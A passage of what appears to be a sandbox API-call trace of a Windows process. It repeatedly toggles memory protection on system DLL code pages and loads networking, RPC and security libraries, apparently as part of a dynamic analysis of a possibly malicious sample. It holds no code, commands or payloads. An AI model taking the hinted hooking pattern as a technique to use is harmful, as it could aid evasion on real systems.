NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.833] GetCurrentProcess () returned 0xffffffff [0111.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711860, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.833] GetCurrentProcess () returned 0xffffffff [0111.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711860, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.834] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0111.834] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=11, lpWideCharStr=0x6ed6b4, cchWideChar=2047 | out: lpWideCharStr="winhttp.dll훜n⹼盃Љ") returned 11 [0111.834] SysReAllocStringLen (in: pbstr=0x6ee6b8*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x6ee6b8*="winhttp.dll") returned 1 [0111.834] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0111.834] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x74610000 [0111.834] GetLastError () returned 0x0 [0111.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611170, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.835] GetCurrentProcess () returned 0xffffffff [0111.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611170, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.835] GetCurrentProcess () returned 0xffffffff [0111.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x746111a4, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.835] GetCurrentProcess () returned 0xffffffff [0111.836] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x746111a4, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.836] GetCurrentProcess () returned 0xffffffff [0111.836] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x746111dc, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.836] GetCurrentProcess () returned 0xffffffff [0111.836] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x746111dc, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.836] GetCurrentProcess () returned 0xffffffff [0111.836] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x746111ec, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.837] GetCurrentProcess () returned 0xffffffff [0111.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x746111ec, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.837] GetCurrentProcess () returned 0xffffffff [0111.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611224, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.837] GetCurrentProcess () returned 0xffffffff [0111.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611224, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.837] GetCurrentProcess () returned 0xffffffff [0111.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611268, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.838] GetCurrentProcess () returned 0xffffffff [0111.838] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611268, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.840] GetCurrentProcess () returned 0xffffffff [0111.840] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611280, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.840] GetCurrentProcess () returned 0xffffffff [0111.840] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611280, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.840] GetCurrentProcess () returned 0xffffffff [0111.840] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611288, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.841] GetCurrentProcess () returned 0xffffffff [0111.841] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611288, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.841] GetCurrentProcess () returned 0xffffffff [0111.841] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611290, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x20) returned 0x0 [0111.841] GetCurrentProcess () returned 0xffffffff [0111.841] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee69c*=0x74611290, NumberOfBytesToProtect=0x6ee6a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee6d4 | out: BaseAddress=0x6ee69c*=0x74611000, NumberOfBytesToProtect=0x6ee6a0, OldAccessProtection=0x6ee6d4*=0x4) returned 0x0 [0111.842] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=10, lpWideCharStr=0x6ed644, cchWideChar=2047 | out: lpWideCharStr="WS2_32.dll\x0b") returned 10 [0111.842] SysReAllocStringLen (in: pbstr=0x6ee648*=0x0, psz="WS2_32.dll", len=0xa | out: pbstr=0x6ee648*="WS2_32.dll") returned 1 [0111.842] CharLowerBuffW (in: lpsz="WS2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0111.842] LoadLibraryExA (lpLibFileName="WS2_32.dll", hFile=0x0, dwFlags=0x0) returned 0x77230000 [0111.842] GetLastError () returned 0x0 [0111.842] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee634*=0x77231224, NumberOfBytesToProtect=0x6ee638, NewAccessProtection=0x4, OldAccessProtection=0x6ee66c | out: BaseAddress=0x6ee634*=0x77231000, NumberOfBytesToProtect=0x6ee638, OldAccessProtection=0x6ee66c*=0x20) returned 0x0 [0111.843] GetCurrentProcess () returned 0xffffffff [0111.843] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee634*=0x77231224, NumberOfBytesToProtect=0x6ee638, NewAccessProtection=0x20, OldAccessProtection=0x6ee66c | out: BaseAddress=0x6ee634*=0x77231000, NumberOfBytesToProtect=0x6ee638, OldAccessProtection=0x6ee66c*=0x4) returned 0x0 [0111.843] GetCurrentProcess () returned 0xffffffff [0111.843] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee634*=0x7723123c, NumberOfBytesToProtect=0x6ee638, NewAccessProtection=0x4, OldAccessProtection=0x6ee66c | out: BaseAddress=0x6ee634*=0x77231000, NumberOfBytesToProtect=0x6ee638, OldAccessProtection=0x6ee66c*=0x20) returned 0x0 [0111.843] GetCurrentProcess () returned 0xffffffff [0111.843] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee634*=0x7723123c, NumberOfBytesToProtect=0x6ee638, NewAccessProtection=0x20, OldAccessProtection=0x6ee66c | out: BaseAddress=0x6ee634*=0x77231000, NumberOfBytesToProtect=0x6ee638, OldAccessProtection=0x6ee66c*=0x4) returned 0x0 [0111.844] GetProcAddress (hModule=0x77230000, lpProcName=0x73) returned 0x77233ab2 [0111.844] SysReAllocStringLen (in: pbstr=0x6ee504*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ee504*="kernel32.dll") returned 1 [0111.844] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.844] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.845] SysReAllocStringLen (in: pbstr=0x6ee504*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x6ee504*="ntdll.dll") returned 1 [0111.845] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0111.845] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0111.848] GetProcAddress (hModule=0x76d30000, lpProcName="SetSystemFileCacheSize") returned 0x76dce379 [0111.848] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetSystemInformation") returned 0x77c61bd4 [0111.851] GetProcAddress (hModule=0x76d30000, lpProcName="PrivIsDllSynchronizationHeld") returned 0x0 [0111.852] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=10, lpWideCharStr=0x6ed3f4, cchWideChar=2047 | out: lpWideCharStr="WS2_32.dllᝌ") returned 10 [0111.852] SysReAllocStringLen (in: pbstr=0x6ee3f8*=0x0, psz="WS2_32.dll", len=0xa | out: pbstr=0x6ee3f8*="WS2_32.dll") returned 1 [0111.852] CharLowerBuffW (in: lpsz="WS2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0111.852] LoadLibraryExA (lpLibFileName="WS2_32.dll", hFile=0x0, dwFlags=0x0) returned 0x77230000 [0111.853] GetLastError () returned 0x0 [0111.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee3e4*=0x77231224, NumberOfBytesToProtect=0x6ee3e8, NewAccessProtection=0x4, OldAccessProtection=0x6ee41c | out: BaseAddress=0x6ee3e4*=0x77231000, NumberOfBytesToProtect=0x6ee3e8, OldAccessProtection=0x6ee41c*=0x20) returned 0x0 [0111.853] GetCurrentProcess () returned 0xffffffff [0111.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee3e4*=0x77231224, NumberOfBytesToProtect=0x6ee3e8, NewAccessProtection=0x20, OldAccessProtection=0x6ee41c | out: BaseAddress=0x6ee3e4*=0x77231000, NumberOfBytesToProtect=0x6ee3e8, OldAccessProtection=0x6ee41c*=0x4) returned 0x0 [0111.853] GetCurrentProcess () returned 0xffffffff [0111.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee3e4*=0x7723123c, NumberOfBytesToProtect=0x6ee3e8, NewAccessProtection=0x4, OldAccessProtection=0x6ee41c | out: BaseAddress=0x6ee3e4*=0x77231000, NumberOfBytesToProtect=0x6ee3e8, OldAccessProtection=0x6ee41c*=0x20) returned 0x0 [0111.854] GetCurrentProcess () returned 0xffffffff [0111.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee3e4*=0x7723123c, NumberOfBytesToProtect=0x6ee3e8, NewAccessProtection=0x20, OldAccessProtection=0x6ee41c | out: BaseAddress=0x6ee3e4*=0x77231000, NumberOfBytesToProtect=0x6ee3e8, OldAccessProtection=0x6ee41c*=0x4) returned 0x0 [0111.854] GetProcAddress (hModule=0x77230000, lpProcName=0x73) returned 0x77233ab2 [0111.855] SysReAllocStringLen (in: pbstr=0x6ee624*=0x0, psz="verifier.dll", len=0xc | out: pbstr=0x6ee624*="verifier.dll") returned 1 [0111.855] CharLowerBuffW (in: lpsz="verifier.dll", cchLength=0xc | out: lpsz="verifier.dll") returned 0xc [0111.855] GetModuleHandleW (lpModuleName="verifier.dll") returned 0x0 [0111.856] SysReAllocStringLen (in: pbstr=0x6ee4c8*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ee4c8*="kernel32.dll") returned 1 [0111.856] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.856] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0111.857] GetLastError () returned 0x0 [0111.860] GetProcAddress (hModule=0x76d30000, lpProcName="GetProductInfo") returned 0x76d51721 [0111.860] FreeLibrary (hLibModule=0x76d30000) returned 1 [0111.870] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=11, lpWideCharStr=0x6ed5ac, cchWideChar=2047 | out: lpWideCharStr="SspiCli.dlln盃헠n") returned 11 [0111.870] SysReAllocStringLen (in: pbstr=0x6ee5b0*=0x0, psz="SspiCli.dll", len=0xb | out: pbstr=0x6ee5b0*="SspiCli.dll") returned 1 [0111.870] CharLowerBuffW (in: lpsz="SspiCli.dll", cchLength=0xb | out: lpsz="sspicli.dll") returned 0xb [0111.870] LoadLibraryExA (lpLibFileName="SspiCli.dll", hFile=0x0, dwFlags=0x0) returned 0x757a0000 [0111.871] GetLastError () returned 0x0 [0111.871] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee59c*=0x757b00ac, NumberOfBytesToProtect=0x6ee5a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee5d4 | out: BaseAddress=0x6ee59c*=0x757b0000, NumberOfBytesToProtect=0x6ee5a0, OldAccessProtection=0x6ee5d4*=0x20) returned 0x0 [0111.871] GetCurrentProcess () returned 0xffffffff [0111.871] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee59c*=0x757b00ac, NumberOfBytesToProtect=0x6ee5a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee5d4 | out: BaseAddress=0x6ee59c*=0x757b0000, NumberOfBytesToProtect=0x6ee5a0, OldAccessProtection=0x6ee5d4*=0x4) returned 0x0 [0111.872] GetCurrentProcess () returned 0xffffffff [0111.872] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee59c*=0x757b00b4, NumberOfBytesToProtect=0x6ee5a0, NewAccessProtection=0x4, OldAccessProtection=0x6ee5d4 | out: BaseAddress=0x6ee59c*=0x757b0000, NumberOfBytesToProtect=0x6ee5a0, OldAccessProtection=0x6ee5d4*=0x20) returned 0x0 [0111.872] GetCurrentProcess () returned 0xffffffff [0111.872] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee59c*=0x757b00b4, NumberOfBytesToProtect=0x6ee5a0, NewAccessProtection=0x20, OldAccessProtection=0x6ee5d4 | out: BaseAddress=0x6ee59c*=0x757b0000, NumberOfBytesToProtect=0x6ee5a0, OldAccessProtection=0x6ee5d4*=0x4) returned 0x0 [0111.873] GetProcAddress (hModule=0x757a0000, lpProcName="InitSecurityInterfaceW") returned 0x757c1314 [0111.873] GetProcAddress (hModule=0x757a0000, lpProcName="InitSecurityInterfaceA") returned 0x757c12ec [0111.873] GetProcAddress (hModule=0x77230000, lpProcName=0x6f) returned 0x772337ad [0111.948] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=10, lpWideCharStr=0x6ed7c4, cchWideChar=2047 | out: lpWideCharStr="RPCRT4.dll\r") returned 10 [0111.948] SysReAllocStringLen (in: pbstr=0x6ee7c8*=0x0, psz="RPCRT4.dll", len=0xa | out: pbstr=0x6ee7c8*="RPCRT4.dll") returned 1 [0111.949] CharLowerBuffW (in: lpsz="RPCRT4.dll", cchLength=0xa | out: lpsz="rpcrt4.dll") returned 0xa [0111.950] LoadLibraryExA (lpLibFileName="RPCRT4.dll", hFile=0x0, dwFlags=0x0) returned 0x76af0000 [0111.950] GetLastError () returned 0x0 [0111.950] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7b4*=0x76b00328, NumberOfBytesToProtect=0x6ee7b8, NewAccessProtection=0x4, OldAccessProtection=0x6ee7ec | out: BaseAddress=0x6ee7b4*=0x76b00000, NumberOfBytesToProtect=0x6ee7b8, OldAccessProtection=0x6ee7ec*=0x20) returned 0x0 [0111.950] GetCurrentProcess () returned 0xffffffff [0111.950] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7b4*=0x76b00328, NumberOfBytesToProtect=0x6ee7b8, NewAccessProtection=0x20, OldAccessProtection=0x6ee7ec | out: BaseAddress=0x6ee7b4*=0x76b00000, NumberOfBytesToProtect=0x6ee7b8, OldAccessProtection=0x6ee7ec*=0x4) returned 0x0 [0111.951] GetCurrentProcess () returned 0xffffffff [0111.951] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7b4*=0x76b00330, NumberOfBytesToProtect=0x6ee7b8, NewAccessProtection=0x4, OldAccessProtection=0x6ee7ec | out: BaseAddress=0x6ee7b4*=0x76b00000, NumberOfBytesToProtect=0x6ee7b8, OldAccessProtection=0x6ee7ec*=0x20) returned 0x0 [0111.951] GetCurrentProcess () returned 0xffffffff [0111.951] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7b4*=0x76b00330, NumberOfBytesToProtect=0x6ee7b8, NewAccessProtection=0x20, OldAccessProtection=0x6ee7ec | out: BaseAddress=0x6ee7b4*=0x76b00000, NumberOfBytesToProtect=0x6ee7b8, OldAccessProtection=0x6ee7ec*=0x4) returned 0x0 [0111.951] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringBindingComposeW") returned 0x76b11420 [0111.952] GetProcAddress (hModule=0x76af0000, lpProcName="RpcBindingFromStringBindingW") returned 0x76b111b9 [0111.952] GetProcAddress (hModule=0x76af0000, lpProcName="RpcBindingSetAuthInfoExW") returned 0x76b1169d [0111.952] GetProcAddress (hModule=0x76af0000, lpProcName="RpcBindingSetOption") returned 0x76b149b6 [0111.952] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0111.955] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=12, lpWideCharStr=0x6ed70c, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll흄n䘨盤현흀n⹼盃Љ") returned 12 [0111.955] SysReAllocStringLen (in: pbstr=0x6ee710*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x6ee710*="ADVAPI32.dll") returned 1 [0111.955] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0111.955] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0111.955] GetLastError () returned 0x0 [0111.956] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711520, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.956] GetCurrentProcess () returned 0xffffffff [0111.956] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711520, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.956] GetCurrentProcess () returned 0xffffffff [0111.956] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711540, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.957] GetCurrentProcess () returned 0xffffffff [0111.957] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711540, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.957] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x7771175c, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.957] GetCurrentProcess () returned 0xffffffff [0111.957] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x7771175c, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711768, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711768, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117b8, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117b8, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117bc, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117bc, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117c8, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.960] GetCurrentProcess () returned 0xffffffff [0111.960] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117c8, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.960] GetCurrentProcess () returned 0xffffffff [0111.960] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117d0, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.960] GetCurrentProcess () returned 0xffffffff [0111.960] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x777117d0, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.961] GetCurrentProcess () returned 0xffffffff [0111.961] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x7771180c, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.961] GetCurrentProcess () returned 0xffffffff [0111.961] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x7771180c, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, 